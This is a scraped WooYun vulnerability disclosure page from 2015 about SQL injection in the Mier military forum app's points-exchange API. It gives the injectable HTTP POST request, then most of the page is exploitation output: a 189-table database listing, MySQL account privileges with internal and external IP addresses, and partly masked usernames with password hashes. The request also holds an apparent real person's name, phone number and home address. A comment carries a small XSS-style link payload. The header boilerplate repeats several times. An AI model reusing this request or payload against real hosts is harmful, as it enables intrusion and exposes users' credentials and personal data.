米尔网某分站SQL高危注射(N多表) | wooyun-2015-0122365| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0122365

漏洞标题：米尔网某分站SQL高危注射(N多表)

漏洞作者： DloveJ

提交时间：2015-06-24 15:43

修复时间：2015-08-08 15:44

公开时间：2015-08-08 15:44

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-06-24：积极联系厂商并且等待厂商认领中，细节不对外公开
2015-08-08：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

详细说明：

米尔军事app某处注射。。俩个是一个厂商。。

app登陆积分兑换处

确定的同时抓包

POST /api/2.0.3/app_integral_exchange.php?plat=android&proct=mierapp&apiCode=1 HTTP/1.1
Content-Length: 235
Content-Type: application/x-www-form-urlencoded
Host: bbs.mier123.com
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Linux; U; Android 4.4.2; zh-cn; MX4 Build/KOT49H) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1
Accept-Encoding: gzip
uid=495505&id=81&count=1&name=%E5%88%98%E4%B8%9C&phone=15104869199&address=%E5%86%85%E8%92%99%E5%8F%A4%E5%8C%85%E5%A4%B4%E5%B8%82%E6%98%86%E9%83%BD%E4%BB%91%E5%8C%BA%E5%86%85%E8%92%99%E5%8F%A4%E7%A7%91%E6%8A%80%E5%A4%A7%E5%AD%A6&cat=0

id可注入

多库

我们跑下15年的库

Database: mier_2015_data
[189 tables]
+--------------------------------+
| `[Table]access`                |
| `[Table]activities`            |
| `[Table]activityapplies`       |
| `[Table]addons`                |
| `[Table]adminactions`          |
| `[Table]admincustom`           |
| `[Table]admingroups`           |
| `[Table]adminnotes`            |
| `[Table]adminsessions`         |
| `[Table]advertisements`        |
| `[Table]announcements`         |
| `[Table]app_action_log`        |
| `[Table]app_forums`            |
| `[Table]app_login_log`         |
| `[Table]app_member`            |
| `[Table]app_post`              |
| `[Table]app_share`             |
| `[Table]armygroup`             |
| `[Table]armygroupadmin`        |
| `[Table]armygroupdonation`     |
| `[Table]armygroupnotice`       |
| `[Table]ask_category`          |
| `[Table]ask_comment`           |
| `[Table]ask_user_score`        |
| `[Table]ask_user_status`       |
| `[Table]ask`                   |
| `[Table]attachmentfields`      |
| `[Table]attachments`           |
| `[Table]attachpaymentlog`      |
| `[Table]attachtypes`           |
| `[Table]banned`                |
| `[Table]bbcodes`               |
| `[Table]caches`                |
| `[Table]connect_memberbindlog` |
| `[Table]credit_logs`           |
| `[Table]creditslog`            |
| `[Table]crons`                 |
| `[Table]debateposts`           |
| `[Table]debates`               |
| `[Table]failedlogins`          |
| `[Table]fam`                   |
| `[Table]family_domain`         |
| `[Table]family_record`         |
| `[Table]family_want`           |
| `[Table]faqs`                  |
| `[Table]favoriteforums`        |
| `[Table]favorites`             |
| `[Table]favoritethreads`       |
| `[Table]feeds`                 |
| `[Table]forum_post_tableid`    |
| `[Table]forumfields`           |
| `[Table]forumlinks`            |
| `[Table]forumrecommend`        |
| `[Table]forums`                |
| `[Table]fruit_order`           |
| `[Table]goods_exchange`        |
| `[Table]goods`                 |
| `[Table]grab_signin`           |
| `[Table]imagetypes`            |
| `[Table]invites`               |
| `[Table]itempool`              |
| `[Table]laud_stamp`            |
| `[Table]magiclog`              |
| `[Table]magicmarket`           |
| `[Table]magics`                |
| `[Table]medallog`              |
| `[Table]medals`                |
| `[Table]member_connect`        |
| `[Table]memberfields`          |
| `[Table]membermagics`          |
| `[Table]memberrecommend`       |
| `[Table]members1`              |
| `[Table]members`               |
| `[Table]memberspaces`          |
| `[Table]moderators`            |
| `[Table]modworks`              |
| `[Table]monument`              |
| `[Table]myapp`                 |
| `[Table]myinvite`              |
| `[Table]mynotice`              |
| `[Table]myposts`               |
| `[Table]mytasks`               |
| `[Table]mythreads`             |
| `[Table]navs`                  |
| `[Table]onlinelist`            |
| `[Table]onlinetime`            |
| `[Table]orders`                |
| `[Table]paymentlog`            |
| `[Table]pk_reply`              |
| `[Table]pk`                    |
| `[Table]plugin_promotion`      |
| `[Table]pluginhooks`           |
| `[Table]plugins`               |
| `[Table]pluginvars`            |
| `[Table]polloptions`           |
| `[Table]polls`                 |
| `[Table]postlogs`              |
| `[Table]postposition`          |
| `[Table]posts`                 |
| `[Table]profilefields`         |
| `[Table]projects`              |
| `[Table]promotions`            |
| `[Table]prompt`                |
| `[Table]promptmsgs`            |
| `[Table]prompttype`            |
| `[Table]purifyhylanda`         |
| `[Table]quick_login`           |
| `[Table]quiz_answer`           |
| `[Table]quiz_cat`              |
| `[Table]quiz_comment`          |
| `[Table]quiz_user_log`         |
| `[Table]quiz`                  |
| `[Table]ranks`                 |
| `[Table]ratelog`               |
| `[Table]regips`                |
| `[Table]relatedthreads`        |
| `[Table]reportlog`             |
| `[Table]request`               |
| `[Table]rewardlog`             |
| `[Table]rsscaches`             |
| `[Table]searchindex`           |
| `[Table]sessions`              |
| `[Table]settings`              |
| `[Table]sign_in`               |
| `[Table]smilies`               |
| `[Table]spacecaches`           |
| `[Table]stats`                 |
| `[Table]statvars`              |
| `[Table]styles`                |
| `[Table]stylevars`             |
| `[Table]tags`                  |
| `[Table]tasks`                 |
| `[Table]taskvars`              |
| `[Table]templates`             |
| `[Table]threadlogs`            |
| `[Table]threads`               |
| `[Table]threadsmod`            |
| `[Table]threadtags`            |
| `[Table]threadtypes`           |
| `[Table]tradecomments`         |
| `[Table]tradelog`              |
| `[Table]tradeoptionvars`       |
| `[Table]trades`                |
| `[Table]typemodels`            |
| `[Table]typeoptions`           |
| `[Table]typeoptionvars`        |
| `[Table]typevars`              |
| `[Table]uc_admins`             |
| `[Table]uc_applications`       |
| `[Table]uc_badwords`           |
| `[Table]uc_domains`            |
| `[Table]uc_failedlogins`       |
| `[Table]uc_feeds`              |
| `[Table]uc_friends`            |
| `[Table]uc_mailqueue`          |
| `[Table]uc_memberfields`       |
| `[Table]uc_members`            |
| `[Table]uc_mergemembers`       |
| `[Table]uc_newpm`              |
| `[Table]uc_notelist`           |
| `[Table]uc_pms`                |
| `[Table]uc_protectedmembers`   |
| `[Table]uc_settings`           |
| `[Table]uc_sqlcache`           |
| `[Table]uc_tags`               |
| `[Table]uc_vars`               |
| `[Table]uin_black`             |
| `[Table]userapp`               |
| `[Table]usergroups`            |
| `[Table]validating`            |
| `[Table]verify_code`           |
| `[Table]war_log`               |
| `[Table]war_threads`           |
| `[Table]war_user_arms`         |
| `[Table]war_user_hoon`         |
| `[Table]war_user_status`       |
| `[Table]war_user`              |
| `[Table]warnings`              |
| `[Table]words`                 |
| `[Table]xreports`              |
| `[Table]xwb_bind_info`         |
| `[Table]xwb_bind_thread`       |
| `[Table]xwb_session`           |
| m_sign_in                      |
| pre_common_member_login        |
| pw_log_forums                  |
| pw_log_members                 |
| pw_log_posts                   |
| pw_log_threads                 |
+--------------------------------+

database management system users privileges
[*] 'bbs'@'10.3.3.%' [16]:
    privilege: ALTER
    privilege: ALTER ROUTINE
    privilege: CREATE
    privilege: CREATE ROUTINE
    privilege: CREATE TEMPORARY TABLES
    privilege: CREATE VIEW
    privilege: DELETE
    privilege: EVENT
    privilege: EXECUTE
    privilege: FILE
    privilege: INDEX
    privilege: INSERT
    privilege: SELECT
    privilege: SHOW VIEW
    privilege: TRIGGER
    privilege: UPDATE
[*] 'monitor'@'10.3.3.103' (administrator)
    privilege: PROCESS
    privilege: SELECT
    privilege: SUPER
[*] 'monitor'@'122.225.105.180' (administra
    privilege: PROCESS
    privilege: SELECT
    privilege: SUPER
[*] 'proxy1'@'10.3.3.%' (administrator) [28
    privilege: ALTER
    privilege: ALTER ROUTINE
    privilege: CREATE
    privilege: CREATE ROUTINE
    privilege: CREATE TABLESPACE
    privilege: CREATE TEMPORARY TABLES
    privilege: CREATE USER
    privilege: CREATE VIEW
    privilege: DELETE
    privilege: DROP
    privilege: EVENT
    privilege: EXECUTE
    privilege: FILE
    privilege: INDEX
    privilege: INSERT
    privilege: LOCK TABLES
    privilege: PROCESS
    privilege: REFERENCES
    privilege: RELOAD
    privilege: REPLICATION CLIENT
    privilege: REPLICATION SLAVE
    privilege: SELECT
    privilege: SHOW DATABASES
    privilege: SHOW VIEW
    privilege: SHUTDOWN
    privilege: SUPER
    privilege: TRIGGER
    privilege: UPDATE
[*] 'rep'@'10.3.3.%' [1]:
    privilege: REPLICATION SLAVE
[*] 'root'@'10.3.3.%' (administrator) [28]:
    privilege: ALTER
    privilege: ALTER ROUTINE
    privilege: CREATE
    privilege: CREATE ROUTINE
    privilege: CREATE TABLESPACE
    privilege: CREATE TEMPORARY TABLES
    privilege: CREATE USER
    privilege: CREATE VIEW
    privilege: DELETE
    privilege: DROP
    privilege: EVENT
    privilege: EXECUTE
    privilege: FILE
    privilege: INDEX
    privilege: INSERT
    privilege: LOCK TABLES
    privilege: PROCESS
    privilege: REFERENCES
    privilege: RELOAD
    privilege: REPLICATION CLIENT
    privilege: REPLICATION SLAVE
    privilege: SELECT
    privilege: SHOW DATABASES
    privilege: SHOW VIEW
    privilege: SHUTDOWN
    privilege: SUPER
    privilege: TRIGGER
    privilege: UPDATE
[*] 'root'@'10.3.3.103' (administrator) [28
    privilege: ALTER
    privilege: ALTER ROUTINE
    privilege: CREATE
    privilege: CREATE ROUTINE
    privilege: CREATE TABLESPACE
    privilege: CREATE TEMPORARY TABLES
    privilege: CREATE USER
    privilege: CREATE VIEW
    privilege: DELETE
    privilege: DROP
    privilege: EVENT
    privilege: EXECUTE
    privilege: FILE
    privilege: INDEX
    privilege: INSERT
    privilege: LOCK TABLES
    privilege: PROCESS
    privilege: REFERENCES
    privilege: RELOAD
    privilege: REPLICATION CLIENT
    privilege: REPLICATION SLAVE
    privilege: SELECT
    privilege: SHOW DATABASES
    privilege: SHOW VIEW
    privilege: SHUTDOWN
    privilege: SUPER
    privilege: TRIGGER
    privilege: UPDATE
[*] 'root'@'127.0.0.1' (administrator) [28]
    privilege: ALTER
    privilege: ALTER ROUTINE
    privilege: CREATE
    privilege: CREATE ROUTINE
    privilege: CREATE TABLESPACE
    privilege: CREATE TEMPORARY TABLES
    privilege: CREATE USER
    privilege: CREATE VIEW
    privilege: DELETE
    privilege: DROP
    privilege: EVENT
    privilege: EXECUTE
    privilege: FILE
    privilege: INDEX
    privilege: INSERT
    privilege: LOCK TABLES
    privilege: PROCESS
    privilege: REFERENCES
    privilege: RELOAD
    privilege: REPLICATION CLIENT
    privilege: REPLICATION SLAVE
    privilege: SELECT
    privilege: SHOW DATABASES
    privilege: SHOW VIEW
    privilege: SHUTDOWN
    privilege: SUPER
    privilege: TRIGGER
    privilege: UPDATE
[*] 'root'@'::1' (administrator) [28]:
    privilege: ALTER
    privilege: ALTER ROUTINE
    privilege: CREATE
    privilege: CREATE ROUTINE
    privilege: CREATE TABLESPACE
    privilege: CREATE TEMPORARY TABLES
    privilege: CREATE USER
    privilege: CREATE VIEW
    privilege: DELETE
    privilege: DROP
    privilege: EVENT
    privilege: EXECUTE
    privilege: FILE
    privilege: INDEX
    privilege: INSERT
    privilege: LOCK TABLES
    privilege: PROCESS
    privilege: REFERENCES
    privilege: RELOAD
    privilege: REPLICATION CLIENT
    privilege: REPLICATION SLAVE
    privilege: SELECT
    privilege: SHOW DATABASES
    privilege: SHOW VIEW
    privilege: SHUTDOWN
    privilege: SUPER
    privilege: TRIGGER
    privilege: UPDATE
[*] 'root'@'localhost' (administrator) [28]
    privilege: ALTER
    privilege: ALTER ROUTINE
    privilege: CREATE
    privilege: CREATE ROUTINE
    privilege: CREATE TABLESPACE
    privilege: CREATE TEMPORARY TABLES
    privilege: CREATE USER
    privilege: CREATE VIEW
    privilege: DELETE
    privilege: DROP
    privilege: EVENT
    privilege: EXECUTE
    privilege: FILE
    privilege: INDEX
    privilege: INSERT
    privilege: LOCK TABLES
    privilege: PROCESS
    privilege: REFERENCES
    privilege: RELOAD
    privilege: REPLICATION CLIENT
    privilege: REPLICATION SLAVE
    privilege: SELECT
    privilege: SHOW DATABASES
    privilege: SHOW VIEW
    privilege: SHUTDOWN
    privilege: SUPER
    privilege: TRIGGER
    privilege: UPDATE
[*] 'test1'@'10.3.3.%' (administrator) [28]
    privilege: ALTER
    privilege: ALTER ROUTINE
    privilege: CREATE
    privilege: CREATE ROUTINE
    privilege: CREATE TABLESPACE
    privilege: CREATE TEMPORARY TABLES
    privilege: CREATE USER
    privilege: CREATE VIEW
    privilege: DELETE
    privilege: DROP
    privilege: EVENT
    privilege: EXECUTE
    privilege: FILE
    privilege: INDEX
    privilege: INSERT
    privilege: LOCK TABLES
    privilege: PROCESS
    privilege: REFERENCES
    privilege: RELOAD
    privilege: REPLICATION CLIENT
    privilege: REPLICATION SLAVE
    privilege: SELECT
    privilege: SHOW DATABASES
    privilege: SHOW VIEW
    privilege: SHUTDOWN
    privilege: SUPER
    privilege: TRIGGER
    privilege: UPDATE
[*] 'test2'@'61.148.221.118' (administrator
    privilege: ALTER
    privilege: ALTER ROUTINE
    privilege: CREATE
    privilege: CREATE ROUTINE
    privilege: CREATE TABLESPACE
    privilege: CREATE TEMPORARY TABLES
    privilege: CREATE USER
    privilege: CREATE VIEW
    privilege: DELETE
    privilege: DROP
    privilege: EVENT
    privilege: EXECUTE
    privilege: FILE
    privilege: INDEX
    privilege: INSERT
    privilege: LOCK TABLES
    privilege: PROCESS
    privilege: REFERENCES
    privilege: RELOAD
    privilege: REPLICATION CLIENT
    privilege: REPLICATION SLAVE
    privilege: SELECT
    privilege: SHOW DATABASES
    privilege: SHOW VIEW
    privilege: SHUTDOWN
    privilege: SUPER
    privilege: TRIGGER
    privilege: UPDATE

漏洞证明：

id userid pwd
1 ji*ubu 4100da4***73e8cab4
4 a*p 18c22a3****6f5747
7 hu*ngcheng 612**08e4f0205797
8 ya**ai 0fd7be5**ff9da2a4f
9 xu*un 09c8864**f328e09bc
10 li*in dd90a9e**b2c011edb
11 wa*hun 6a60cc**11978bae948
281 jun*jia f6852cc**2f70c789c1
uid username password
1 sdmf**kasd 56137***51fd76c60fbed3a
2 米尔007 f1847424********04f3636d4c5fc9b
4 米尔 a2fcf4e******28ec8d0bcb19ad0e2
5 \xc7Řłż 46d6ac1a******93d562cfd10aff4
6 国风 7fa44e2a*****2fb30a466e051
7 米尔最高统帅部 be914c******5ee6c3c0d8b7557

修复方案：

版权声明：转载请注明来源 DloveJ@乌云

漏洞回应

厂商回应：

未能联系到厂商或者厂商积极拒绝

漏洞Rank：15 (WooYun评价)

漏洞评价：

2015-07-06 13:51 | DloveJ ( 普通白帽子 | Rank:1107 漏洞数:200 | <a href=javascrip:alert('xss')>s</a> 点...)

给高rank，拜托了。。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0122365

漏洞标题：米尔网某分站SQL高危注射(N多表)

相关厂商：米尔网

漏洞作者： DloveJ

提交时间：2015-06-24 15:43

修复时间：2015-08-08 15:44

公开时间：2015-08-08 15:44

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 DloveJ@乌云

漏洞回应

厂商回应：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0122365

漏洞标题：米尔网某分站SQL高危注射(N多表)

相关厂商：米尔网

漏洞作者： DloveJ

提交时间：2015-06-24 15:43

修复时间：2015-08-08 15:44

公开时间：2015-08-08 15:44

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：未联系到厂商或者厂商积极忽略

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0122365"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 DloveJ@乌云

漏洞回应

厂商回应：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：